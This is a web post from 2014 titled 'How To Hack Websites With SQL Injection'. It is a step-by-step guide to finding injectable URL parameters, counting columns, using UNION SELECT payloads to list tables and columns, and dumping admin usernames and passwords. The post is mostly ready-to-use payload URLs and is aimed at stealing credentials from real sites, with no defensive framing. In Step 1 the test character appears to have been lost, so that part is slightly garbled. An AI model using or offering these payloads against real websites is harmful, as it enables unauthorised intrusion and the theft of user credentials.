How To Hack Websites With SQL Injection SQL Injection attacks are code injections that exploit the database layer of the application. Step 1: When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this: site/page=1Once you have found a page like this, we test for vulnerability by simply entering a after the number in the url. For example: site/page=1 If the database is vulnerable, the page will spit out a MySQL error such as; Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29 If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection. Step 2 Now we need to find the number of union columns in the database. We do this using the order by command. We do this by entering order by 1--, order by 2-- and so on until we receive a page error. For example: site/page=1 order by 1-- site/page=1 order by 2-- site/page=1 order by 3-- site/page=1 order by 4-- site/page=1 order by 5-- Step 3 We now are going to use the union command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--, for example: site/page=1 union all select 1,2,3,4-- If this is done successfully the page should show a couple of numbers somewhere on the page. Step 4 We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands: user() database() version() or if these dont work try... @@user @@version @@database For example the url would look like: site/page=1 union all select 1,user(),version(),4-- The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83. Step 5 In this step our aim is to list all the table names in the database. To do this we enter the following command after the url. site/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables-- If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. Step 6 In this Step we want to list all the column names in the database, to do this we use the following command: site/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()-- This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password. Step 7 Finally we need to dump the data, so say we want to get the username and password fields, from table admin we would use the following command, site/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin-- Here the concat command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website
Posted on: Thu, 16 Jan 2014 14:07:07 +0000
Trending Topics
Recently Viewed Topics
© 2015